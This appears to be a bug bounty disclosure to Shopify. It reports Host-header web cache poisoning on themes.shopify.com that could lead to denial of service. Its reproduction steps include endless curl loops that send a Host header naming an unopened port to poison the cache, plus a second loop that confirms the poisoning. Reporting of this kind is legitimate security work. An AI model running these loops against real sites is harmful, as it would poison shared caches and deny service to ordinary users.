Hi there, I just found the website: https://themes.shopify.com is infected with "Web cache poisoning" via HOST header lead to Denial of Services Abuse this bug, Attacker can: Poison your cache with HTTP header Host header with arbitrary PORT which is not opened. This attack may lead to Denial of Services How to reproduce the issue: In the 1st terminal, run command likes this: ---------- $ while true; do curl -ik "https://themes.shopify.com:443/?g4mm4=hitthecache" -H "Host: themes.shopify.com:1337"|grep ":1337"; sleep 0;echo 1; done ---------- In the 2nd terminal, run command below for confirmation this attack is successful or not: ---------- $ while true; do curl -ik "https://themes.shopify.com:443/"|grep ":1337"; done ---------- and the output from command with be confirmed my Host header poisoning worked: $ while true; do curl -ik "https://themes.shopify.com:443/"|grep ":1337"; done % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0

Shopify: https://themes.shopify.com::: Host header web cache poisoning lead to DoS